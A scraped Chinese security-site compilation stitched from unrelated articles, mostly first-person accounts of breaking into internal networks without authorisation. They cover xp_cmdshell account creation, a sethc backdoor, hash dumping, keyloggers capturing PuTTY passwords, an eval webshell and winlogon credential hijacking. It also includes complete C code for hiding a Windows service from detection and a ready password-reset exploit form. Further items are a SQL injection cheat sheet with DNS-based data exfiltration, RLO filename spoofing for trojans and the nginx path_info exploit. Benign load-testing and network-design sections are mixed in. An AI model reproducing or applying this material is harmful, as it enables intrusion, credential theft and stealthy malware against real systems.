描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行，再通过自己的灵活思维运用。

环境：2003 SERVER
IIS ：6.0 支持php
数据库：MSSQL和MYSQL
网站类型：ASPX

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

E：盘可以浏览
F：盘可以浏览

本站ASPX 类型网站，使用的是MSSQL数据库。显示密码不是最高权限的用户，就是是个DB用户提权也不能马上到手。

再翻翻别的站点，目录可以浏览一个个找吧。发现一个目录web.config有SA用户

连接数据库信息：

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打开aspxspy，使用database连接功能。

登录成功，显示SA看来应该没有降权。

连接状态是MSSQL 2005，要先启xp_cmdshell.

接着执行下命令"whoami"

good，system 权限，下面就是添加一个账号了。。
Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否开启
Exec master.dbo.xp_cmdshell 'netstat -ano'

OK,状态正常。
Exec master.dbo.xp_cmdshell 'ipconfig /all'显示配置是内网IP

通过域名解析到的IP连接3389，可以连接。
说明管理做了端口映射，这就不要转发端口了。省了很多功夫！

这才拿到了一台服务器的权限，从网站的SQL连接上不难发现内网还有SQL服务器。

渗透继续……

内网IP为200，同样是MSSQL SA权限。

<add key="ConnectionString2" value="server=192.168.8.200;database=DB_CustomSMS;User=sa;PWD=*****"/>

再利用aspxspy 数据库连接，

郁闷的事情发生了，不能连接。
[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。

按道理讲数据库能使用的情况下应该可以成功连接上的，难道没有配置TCP/IP访问数据库？疑问产生了，无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL，有查询分析器和企业管理器。这又成了我们的工具。呵呵！
SQL分析器连接之，仍然无法连接。

先测试下所在的MSSQL服务器机器的存在性。

成功响应，说明服务器存在。
运行mstsc试着3389连接下，显示了一个xp的界面。比较郁闷耶。

试下名称解析服务。。。
点击浏览一看，这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。

成功返回查询窗口。试下xp_cmdshell

发现不存在，恢复之
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
OK！

执行命令"whoami",虽然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系统错误。不是没权限添加。。。。不明真像了。。。

思路：开了3389可以用sethc.exe 替换来。。。

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替换之？
问题又来了，提示磁盘文件不足。
利用xp_dirtree查看下C盘
EXEC MASTER..XP_dirtree 'c:',1,1

列出文件目录，删除一个数据库的备份
再执行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

提示一个文件被复制，说明成功。3389 5次shift未弹出。

再试下
exec xp_cmdshell 'net user 123 123 /add' 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开！
exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登录之。。
exec xp_cmdshell 'net user 123 /del'删除用户

内网还存在很多机器，此次渗透就此结束。。。

总结：内网从端口转发到外部连接，再从3389登录内部3389 跟跳板技术差不多。

相关文章

• 域内网中的信息收集之一内网结构的探测
• 渗透某大型内网入侵过程
• 搞内网的一个小技巧
• 域中渗透积累
• 内网渗透案例
• 内网渗透中SSh的巧用
• 内网渗透心得
• 内网信息泄漏面面观
• 高级内网渗透工具:Paris (创建VPN)
• 大企业内网渗透的常见软件级突破点

由于平时比较忙，用了很久的VPN肉鸡飞掉了，近来正好有时间于是打开google搜索upfile.asp开始找肉鸡，来了台湾某XX站，http://xxx.xxx.tw/xx/upfile.asp，为了不必要的麻烦，我隐藏了敏感内容。直接到传asp提示错误，那么直接传了gif以后，查看上传路径发现自己重命名了，如果没有重命名的话在IIS6下百分之90以上可以拿shell了，除去目录末有执行脚本权限。最后抓包分析改上传路径，最后得到一个shell，图1。具体方法翻翻以前杂志或google找吧，一找一大堆。

执行命令后，发现权限还比较大，能够执行一些简单命令，像net user、ipconfig /all等等。。

不过执行添加用户的肯定是不行了，由于支持ASPX我想起来去年暴的本地提权，直接上传Churrasco.exe，我这里命名为c.exe。运行命令为：/c E:websitewwwrootxxxxxupc.exe "net user nohack nohack /add"。必须有双引号，双引号里是执行的命令。最后成功加了用户，。

执行netstat -an发现3389开放，很兴奋的连接上去，却提示“无法连接远程计算机”，不应该呀，明明开着3389呢，google了下.

一般开了3389无法连接的原因有：
1、服务器在内网。用显示的IP来看是用公网IP的，先排除。
2、做了tcp/ip筛选。执行CMD命令：cmd /c regedit -e c:1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip，导出注册表里关于TCP/IP筛选的第一处，这种原因是查看导出的内容EnableSecurityFilters这个字段里dword后面的键值是否为00000000，如果为00000001就说明管理员做了tcp/ip筛选，我们只要把1改成0就行了。还有两个地方要导出，可是我导出来都是这三个word后面的键值都为00000000看来也不是这种原因。
3、做了ip安全策略。执行cmd命令： cmd /c net stop policyagent 将IPSEC Services服务停了它。再连3389。还是连接不上。
4、管理员设置的终端登陆权限只有指定的用户可以。这种原因应该是可以连接、无法登录。也排除。
5、防火墙。在webshell执行了下tasklist，发现有几个进程比较可疑。如almon.exe、alsvc.exe、SAVAdminService.exe等。

搜索下几个进程名发现是Sophos Anti-Virus(SAV)英国开发的一个杀毒软件，网上好评还不少。莫非是它搞的鬼，看看能不能直接结束掉，结果试了一下还真能结束掉，不过还是连接不上。原因不明中。因为这个网站禁止中国大陆的IP，这期间我试了反弹CMD，反弹IP是美国的一个肉鸡、端口转发等，最后我直接传了一个反弹的远程木马，在WEBSHELL执行，因为我有管理员的权限执行命令了，不过最后都没有弹出来。连http协议都没弹出来，当真是郁闷。

既然这样还是在webshell里收集一下本机信息吧，执行net view查看有没有其他机器，结果还真有，图5

突然发现自己变笨了，我既然有这台的cmdshell权限，把这台的HASH密码跑出来以后可以连接其他机器呀。何况我这台还是个分站，而主站上面有N个分站，每个IP也都不一样。于是上传pwdump抓了HASH，由于没有彩虾表用LC5跑之。图6。

接着对整个C段扫了一下3389，结果只有3台机器开放，我拥有权限的是16x.xxx.xxx.99，扫出的一台16x.xxx.xxx.69也开放3389了，接着把这个IP拿到查旁注的网站看了下，结果不少都是分站和一些相关的站。试了一下，可以直接连接，用LC5跑出的一个密码登录，结果显示登录成功，却永久的停在这里，不能继续任何操作，真晕，以前还真没遇到过。

接着用了administrator的密码登录，这次成功了进入了桌面，执行了ipconfig /all看下大致环境，发现还有DNS服务器，如图9所示。

一般DNS服务器也就是域服务器，接着我用net view /domain看了下有几个域。看来我所在的是INTRANE***这个域里面，继续用net view看了下本机所在的域约有多少台机器，如图10所示。

用net time /domain探测了下时间服务器，末权限，在用经典的net group "domain admins" /domain同样是末权限，正在想办法如何进行下一步的时候看到桌面有个远端桌面的东东，打开一看里面有管理员保存成着其他机器里的IP，试了一下这个段的其他机器都可以连进去，看来管理员又是用的一卡通，如图11所示。

加用端口扫描器扫的，这个段一个有20多台机器都开3389了，密码都可以进，不过我还末满足，这么多域呢，继续渗透吧，分析了下情况，现在172.16.1.*的IP段基本都已经搞定了，因为台湾的时间差和大陆几乎一样，为了避免和管理员“撞车”，我决定晚上再行动。到了晚上登录连上去的时候发现管理员果真登录了，有图为证，如图12所示。

而且管理员在退出的时候是断开的，并末有注销，接着我开了一个NP写的终端监视脚本，管理员在登录的时候会注销我自己，运气还不错，得到了一台XP系统，接着抓HASH，破密码省略之。

既然管理员用这台管理其他机器，那么我装一个键盘记录工具上去，把akl.exe扔上去了记录一下，一连记录了几天，什么也没记录到，在分析了下，暂时不想用CAIN嗅密码，试着用MS08067溢出，结果显示成功，在telnet的时候失败，郁闷中，图13。

IPC连接试下，失败。又过了两天登录上去一看，发现记录到了putty的密码，原来还有unix系统呀，如图14、15所示。

不但记录到了putty，还包括网页、信箱之类的。看来这个键盘记录安装的挺成功。接着用putty登录，图16。

ls -a列了下目录，netstat -an，查了下端口，发现开了80。我对UNIX的渗透经验不是特别足，先放在一边，直接用echo "<?php @eval($_POST[cmd]);?>">index.php，写进了一个SHELL。

思考一下，溢出、IPC已经试过，嗅探不得已的办法，还有一招末有试，winlogon劫持记录的工具，如图17。

这东东可以记录域管理员在本机登录的时的密码，我把我已经控制的所有机器差不多每台一份都中上了这个东东。过了不到一个星期的功夫上去果然记录到了很多密码，如图18。

记我没想到的是，其他域里面具然还有E文系统的机器，最后用其他域管理帐号登录，

相关文章

• MSSQL 入侵提权之内网渗透案例分析
• 搞内网的一个小技巧
• 域环境下的渗透
• 专业渗透人员在渗透过程中注意事项
• 域中渗透积累
• 内网渗透案例
• 域内网中的信息收集之一内网结构的探测
• 内网渗透中SSh的巧用
• 内网渗透心得
• Infiltrating a Botnet

过RKU,GMAER的dll模块检查的代码，就两句：

ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;

//下面是一个ring3下隐藏服务的代码，也是抄别人小小修改了一下而已的：

#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#include <Tlhelp32.h>

// 几个Undocument的结构

typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

typedef struct _SC_SERVICE_PROCESS

{

PSC_SERVICE_PROCESS Previous;

PSC_SERVICE_PROCESS Next;

WCHAR *ImagePath;

DWORD Pid;

DWORD NumberOfServices;

// ...

} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE

{

PSC_DEPEND_SERVICE Next;

DWORD Unknow;

PSC_SERVICE_RECORD Service;

// ...

} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD

{

PSC_SERVICE_RECORD Previous;

PSC_SERVICE_RECORD Next;

WCHAR *ServiceName;

WCHAR *DisplayName;

DWORD Index;

DWORD Unknow0;

DWORD sErv;

DWORD ControlCount;

DWORD Unknow1;

PSC_SERVICE_PROCESS Process;

SERVICE_STATUS Status;

DWORD StartType;

DWORD ErrorControl;

DWORD TagId;

PSC_DEPEND_SERVICE DependOn;

PSC_DEPEND_SERVICE Depended;

// ...

} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)

{

int iLen;

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);

if ((iLen > 1) || (iLen < 20))

{

ZeroMemory(lpChar, 40);

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);

}

return iLen;

}

BOOL SetDebugPrivilege()

{

BOOL bRet = FALSE;

HANDLE hToken = NULL;

LUID luid;

TOKEN_PRIVILEGES tp;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))

{

tp.PrivilegeCount = 1;

tp.Privileges[0].Luid = luid;

tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);

}

if (hToken) CloseHandle(hToken);

return bRet;

}

DWORD GetProcessIdByName(char *Name)

{

BOOL bRet = FALSE;

HANDLE hProcessSnap = NULL;

PROCESSENTRY32 pe32 = { 0 };

DWORD Pid = -1;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hProcessSnap, &pe32))

{

do

{

if (!lstrcmpi(pe32.szExeFile, Name ) )

{

Pid = pe32.th32ProcessID;

break;

}

}

while (Process32Next(hProcessSnap, &pe32));

}

CloseHandle(hProcessSnap);

return Pid;

}

// 修改内存属性为指定值

void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)

{

MEMORY_BASIC_INFORMATION mbi;

DWORD dwOldProtect, dwWritten;

VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);

WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);

}

//寻找服务链表

PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)

{

char FileName[MAX_PATH+1];

HANDLE hFile, hFileMap;

UCHAR * pMap;

DWORD dwSize, dwSizeHigh, i, dwRead;

SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

GetSystemDirectory( FileName, MAX_PATH );

strcat( FileName,"\\Services.exe");

hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,

NULL, OPEN_EXISTING, 0, NULL);

if (INVALID_HANDLE_VALUE == hFile) return NULL;

dwSizeHigh = 0;

dwSize = GetFileSize(hFile, &dwSizeHigh);

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);

if (NULL == hFileMap) return NULL;

pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);

if (NULL == pMap) return NULL;

dwSize -= 12;

for (i=0; i<dwSize; ++i)

{

// 搜索services!ScGetServiceDatabase特征代码

if (*(DWORD*)(pMap+i) == 0xa1909090 &&

*(DWORD*)(pMap+i+8) == 0x909090c3)

{

if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&

ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

SvcRd.sErv == 'vrEs') // ServiceRecord结构的特征

{

pRet = pSvcRd;

break;

}

}

}

UnmapViewOfFile(pMap);

CloseHandle(hFileMap);

CloseHandle(hFile);

//printf( "addr: 0x%08x\n", (DWORD *)pRet );

return pRet;

}

// 隐藏服务

BOOL HideService(char *Name)

{

DWORD Pid;

HANDLE hProcess;

SC_SERVICE_RECORD SvcRd, *pSvcRd;

DWORD dwRead, dwNameSize;

WCHAR SvcName[MAX_PATH] = { 0 };

char lpSvcName[256] = {0};

dwNameSize = strlen(Name)*2; //UNICODE的话，长度要乘以2

if (dwNameSize > sizeof(SvcName))

{

return FALSE;

}

Pid = GetProcessIdByName("Services.exe");

if (Pid == -1)

{

printf("get pid error\r\n");

return FALSE;

}

if(!SetDebugPrivilege())

{

printf("SetDebugPrivilege error\r\n");

return FALSE;

}

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

if (NULL == hProcess)

{

printf("OpenProcess error:%d\r\n",GetLastError());

return FALSE;

}

pSvcRd = FindFirstServiceRecord(hProcess);

if (NULL == pSvcRd)

{

printf("FindFirstServiceRecord error\r\n");

CloseHandle(hProcess);

return FALSE;

}

do

{

if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))

{

//OutputDebugStringW(SvcName);

// 匹配服务名

memset(lpSvcName,0,sizeof(lpSvcName));

UnicodeToAnsiStr(lpSvcName,SvcName);

if (lstrcmpi(lpSvcName, Name) == NULL)

{

// 从链表中断开（一般来说ServiceRecord是可写的，但还是先改保护属性以防万一）

ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);

ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);

CloseHandle(hProcess);

return TRUE;

}

}

else

{

break;

}

}

while (pSvcRd = SvcRd.Next);

if( NULL != hProcess )

{

CloseHandle(hProcess);

}

return FALSE;

}

int main()

{

HideService("Alerter");

return 0;

}

相关文章

• MiniTelnet(ASM版)
• Check MD5(md5sum for php)
• Win32 download url shellcode
• HTML通用免杀
• 超强NB 的弹出代码，不弹都不行，3721，GOOGLE工具都拦截不了。

在文件\User\ GetPassword.asp中：

ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword ='"& NoSqlHack(p_pass_new) &"' where UserName = '"& NoSqlHack(StrUserName) &"' and Email = '"& NoSqlHack(Replace(Request.Form("Email"),"''",""))&"'") //第220行
用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。

<*参考 Bug.Center.Team *>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<form id="form1" name="form1" method="post" action="http://ssvdb.com/User/GetPassword.asp">

<input name="Action" type="text" id="Action" value="step3" />

<input name="pass_new" type="text" id="pass_new" value="123456" />

<input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" />

<input name="Email" type="text" id="Email" value="bb@126.com" />

<input name="UserName" type="text" id="UserName" value="bb" />

<input type="submit" name="Submit" value="提交" />

</form>

相关文章

• JBoss企业应用平台JMX控制台安全绕过漏洞
• 网页编辑器漏洞手册
• Discuz! 7.2 最新注入漏洞分析与利用
• fckeditor漏洞,通杀PHPMPS
• Discuz!NT 3.0 特殊环境下利用漏洞
• XOOPS 2.2.6 鸡肋本地包含漏洞
• 封堵Windows Server 2008几个明显漏洞
• 动网多个版本上传漏洞
• 如何防范利用漏洞的攻击
• 分清安全漏洞的危险级别

http_load以并行复用的方式运行，用以测试web服务器的吞吐量与负载。但是它不同于大多数压力测试工具，它可以以一个单

一的进程运行，一般不会把客户机搞死。还可以测试HTTPS类的网站请求。
#wget http://www.acme.com/software/http_load/http_load-12mar2006.tar.gz
#tar zxvf http_load-12mar2006.tar.gz
#cd http_load-12mar2006
#make && make install
#http_load -p并发访问进程数 -f总计的访问次数 -r每秒的访问频率 -s访问时间  需要访问的url文件
#echo "http://192.168.1.101/test.php" >1.txt
#http_load -p 30 -s 60 1.txt
7751 fetches, 30 max parallel, 2.9119e+08 bytes, in 60.0024 seconds
37568 mean bytes/connection
129.178 fetches/sec, 4.85297e+06 bytes/sec
msecs/connect: 77.8017 mean, 3050.89 max, 30.308 min
msecs/first-response: 50.3716 mean, 9148.3 max, 31.205 min
HTTP response codes:code 200 -- 7751                说明打开响应页面的类型

http://www.acme.com/software这个网站上有很多小工具:http_ping、http_get、http_post

还有一个secure HTTP server:thttpd

二、webbench

#wget http://blog.s135.com/soft/linux/webbench/webbench-1.5.tar.gz
#tar zvxf webbench-1.5.tar.gz
#cd webbench-1.5
#make && make install
webbench -c 并发数 -t 运行测试时间 url
#webbench -c 5000 -t 30 http://192.168.1.101/test.php

三、ab

ab是apache自带的一款功能强大的测试工具,一般安装apache就默认安装的
#/usr/local/apache/bin/ab -c 100 -n 100 http://192.168.1.101/test.php
-c -n 是常用的两个
This is ApacheBench, Version 2.3 <$Revision: 655654 mce_markergt;
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/

Benchmarking 192.168.1.101 (be patient).....done

Server Software:        Apache/2.2.3
Server Hostname:        192.168.8.201
Server Port:            80

Document Path:          /1.php
Document Length:        37752 bytes

Concurrency Level:      100
Time taken for tests:   0.908 seconds
Complete requests:      100
Failed requests:        0
Write errors:           0
Total transferred:      3923458 bytes
HTML transferred:       3905226 bytes
Requests per second:    110.11 [#/sec] (mean)
Time per request:       908.165 [ms] (mean)
Time per request:       9.082 [ms] (mean, across all concurrent requests)
Transfer rate:          4218.95 [Kbytes/sec] received

Connection Times (ms)
min  mean[+/-sd] median   max
Connect:       34   34   1.8     34      42
Processing:   109  519 246.1    474     868
Waiting:       35   78  61.8     56     285
Total:        151  553 245.5    508     901

Percentage of the requests served within a certain time (ms)
50%    508
66%    797
75%    814
80%    840
90%    883
95%    883
98%    901
99%    901
100%    901 (longest request)

四、Siege

一款开源的压力测试工具，可以根据配置对一个WEB站点进行多用户的并发访问，记录每个用户所有请求过程的相应时间，并在一定数量的并发访问下重复进行。
#wget ftp://ftp.joedog.org/pub/siege/siege-latest.tar.gz
#tar zvxf siege-latest.tar.gz
#cd siege-latest
#./configure && make && make install
#siege -c 100 -r 100 http://192.168.1.101/test.php
Transactions:                  10000 hits  1w点击率
Availability:                 100.00 %     成功率
Elapsed time:                  90.29 secs  总共用时
Data transferred:             365.56 MB    总共数据的传输
Response time:                  0.21 secs  显示网络连接的速度
Transaction rate:             110.75 trans/sec每秒完成处理次数
Throughput:                     4.05 MB/sec 平均每秒传送数据
Concurrency:                   23.61        最高并发量
Successful transactions:       10000        成功次数
Failed transactions:               0        失败次数
Longest transaction:           14.70        每次传输所花最长时间
Shortest transaction:           0.12        每次传输所花最短时间

相关文章

• 再分享一个aspx的ddos脚本
• 分享国外一个PHP DDOS的脚本
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 应对服务器被DDOS攻击的紧急措施
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出

http://www.4shell.org/archives/1777.html

其实这个算不上是漏洞也谈不上0day，只能说是一个windows fun罢了。

测试如下：

1.选择任意一个exe文件，鼠标右键选择重命名：

2.选择插入unicode控制字符，选择:RLO Start of right-to-left override

3.重命名文件为：text.exe。你将会发现：

4.双击这个“所谓的txt”看看：

5.执行成功！假如我把这个Md5Checker工具换成txt图标的一个木马呢？你还敢执行这个"所谓的txt"吗？

lol

相关文章

• 橙色预警：PHP PATH_INFO 存在漏洞
• Shopex V4.8.4 V4.8.5 0Day 通杀
• PDF最新0day
• Firefox 3.6 0day被补了
• DedeCms v5.5 0day
• 瑞星本地提权通杀利用代码
• IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告
• Gnuboard 0day&Exp
• 新云4.0最新0day
• phpcms2008 最新0day & Exp

一、order by 的参数注入技巧：
两种方法，思路都一样。

example. “select username,password from uc_members order by”.$_GET['oderby']

a.常见的利用方法：

1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));

返回错误：[Err] 1242 – Subquery returns more than 1 row

2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));

返回正常。

b.国外paper看到的方法：

1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;

返回错误：[Err] 1242 – Subquery returns more than 1 row

2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;

返回正常。

二、limit 的参数注入技巧：

a.order by之后的limit参数 的注入，因为正常的sql语句order by后无法接union，所以没有好办法，就一个鸡肋思路：into outfile ‘/www/root/xxx.php’;

b.limit前无order by时的注入，那就方便多了，后面可以直接接union select ，随便怎么注都行了：

select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7

这里还有个技巧，使用procedure analyse可以获取字段名称：

select * from cdb_members where uid=1 limit 1,1 procedure analyse()

不过procedure analyse同样不能使用在order by之后：

[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()

[Err] 1386 – Can’t use ORDER clause with this procedure

三、无法猜测字段时的技巧：

在mysql5以下版本或者information_schema 无法访问的时候，无法猜到某个表的字段名，于是可以采用这个办法，在子查询中使用%0，报错获得列名。以ucenter的uc_members为例。

1.猜测列数：

SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)

返回错误：#1241 – Operand should contain 12 column(s)

2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)

返回正常。

3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)

返回错误：#1048 – Column ‘uid’ cannot be null

4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)

返回错误：#1048 – Column ‘username’ cannot be null
5. ……

注：5.1以上版本不适用，字段必须为非空（not null）

四、windows下利用dns解析盲注的技巧：

如果盲注很累，或者页面无论and 1=1还是and 1=2的时候返回都一模一样，这个时候利用dns进行注入是个不错的方法，前提是win环境root权限下的mysql，利用load_file函数读取远程文件的思路。本地搭建一个dns服务器，然后将特定域名的NS server转过来。然后进行注入，并抓包。

本地测试了下（实际注入中单引号可以编码）：

select load_file(concat(‘\\\\aaa1.’,(select user()),’.oldjun.com\\a.txt’))

抓包成功获得select的结果：

29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

如图所示：

相关文章

• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySQLhack
• MySql远程任意用户建接语句

使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵，直到5.21日凌晨，nginx尚未发布修复该漏洞的补丁；已经有一些网站被黑了，管理员速修复！

测试方法：

Nginx的服务器上传图片访问图片地址，后面加上4shell.php

例如：www.xx.com/upload/201005219527.jpg/4shell.php

临时修补方法,可3选其一

1、设置php.ini的：

cgi.fix_pathinfo为0

重启php。最方便，但修改设置的影响需要自己评估。

2、给nginx的vhost配置添加如下内容，重启nginx。vhost较少的情况下也很方便。

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

3、禁止上传目录解释PHP程序。不需要动webserver，如果vhost和服务器较多，短期内难度急剧上升；建议在vhost和服务器较少的情况下采用。

相关文章

• 分享国外一个PHP DDOS的脚本
• 你还敢执行txt文件吗？Windows 0day
• Nginx 0.8.35 Space Character Remote Source Disclosure
• nginx 目录自动加斜线
• Shopex V4.8.4 V4.8.5 0Day 通杀
• PDF最新0day
• Firefox 3.6 0day被补了
• DedeCms v5.5 0day
• 瑞星本地提权通杀利用代码
• IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告

1: 设置好就高枕无忧了

我要讲到的第一个错误更偏重于计划而不是网络设计。这种错误我一般将它称之为“设计好就高枕无忧”。犯这种错误的企业一般会下大力气去设计一个安全的网络，但是却忽略了后期对于这个设计的定期性的重新评估。因为网络风险是在不断变化的，因此企业的网络安全设计也应该不断进化。最好的办法就是定期对网络安全设计进行重新评估。

2: 在防火墙上开放过多的端口

我们都知道开放过多的端口没有好处，但是有时候又不得不多开放几个端口。就拿 Microsoft Office Communications Server 2007 R2来说吧，如果你计划提供外部访问功能，那要多开十几个端口。另外， OCS 2007 R2还会随机开放大量的端口。这种情况下，网络安全管理员该怎么办呢？

最好的解决方案之一是采用逆向代理（如微软的ForeFront Threat Management Gateway）。逆向代理的位置介于互联网和本地需要开放多个端口的服务器之间。这样设置后，服务器不需要再开放大量的端口，而外界对服务器的连接请求会先经过逆向代理进行拦截和过滤，并传递给服务器。这种设计不但能让服务器在外网前隐藏起来，还能帮助确保外部的恶意请求不会到达服务器。

3: 不同应用程序混在一起

在经济危机下，企业很少会花钱添置新设备，因此尽可能压榨现有设备资源就成了唯一选择。在这种前提下，企业一般会在一台服务器上安装多个应用服务，让一台服务器扮演多个角色。虽然这么做并不是被禁止的，但是在计算机行业有一个规律，即代码越多，出现安全漏洞的机会就越多。

我并不是说每个服务器只能运行一种应用程序，或者扮演一种服务角色，但是至少我们应该仔细考虑应该把哪些应用程序或服务角色合并到一台服务器上。比如，在最小需求下，一个Exchange 2007需要三个服务器角色（hub transport, client access, 以及 mailbox server），你可以将这三个角色整合到一台服务器上。但是如果你要为外部客户提供Outlook Web Access服务就不要这样做了。因为Client Access Server服务器角色需要用到IIS来实现Outlook Web Access，也就是说，如果你将客户接入服务器角色和hub transport以及mailbox server 角色放在了一台服务器上，实际上就是把你的邮箱数据库开放给了互联网上的所有黑客。

4: 忽略了网络中的工作站

去年有个记者通过电话采访我，他问：您觉得对于网络安全威胁最大的是什么。我的回答是：网络里的工作站是网络安全的最大威胁。现在我仍持同样看法。我总是看到企业在不但的加强网络服务器的安全性，但同时却忽视了网络内的每一台工作站。除非工作站的安全防护措施非常好，否则使用它的员工很容易在不经意间让系统被恶意软件入侵。

5: 在必要的情况下没有使用SSL加密

